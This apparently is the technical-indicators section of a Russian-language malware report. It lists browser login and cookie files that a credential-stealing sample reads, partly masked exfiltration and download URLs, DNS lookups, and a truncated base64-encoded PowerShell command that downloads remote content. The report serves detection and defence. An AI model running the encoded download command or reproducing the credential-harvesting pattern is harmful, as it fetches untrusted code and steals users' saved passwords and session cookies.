Техническая информация
- %LOCALAPPDATA%\google\chrome\user data\default\login data
- %APPDATA%\opera software\opera stable\login data
- %LOCALAPPDATA%\google\chrome\user data\default\cookies
- %TEMP%\46615.txt
- %TEMP%\46615.txt
- 'ra####.#00webhostapp.com':80
- http://dp##te.com/B9M4X8F9Z.txt
- http://dp##te.com/FZ7DQD5TT.txt
- http://ra####.#00webhostapp.com/TPS_X4.php?me####################################################################################################################################################...
- http://ra####.#00webhostapp.com/upload.php
- DNS ASK dp##te.com
- DNS ASK ap#.#y-ip.io
- DNS ASK ra####.#00webhostapp.com
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -enc KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AZABwAGEAcwB0AGUALgBjAG8AbQAvAEYAWgA...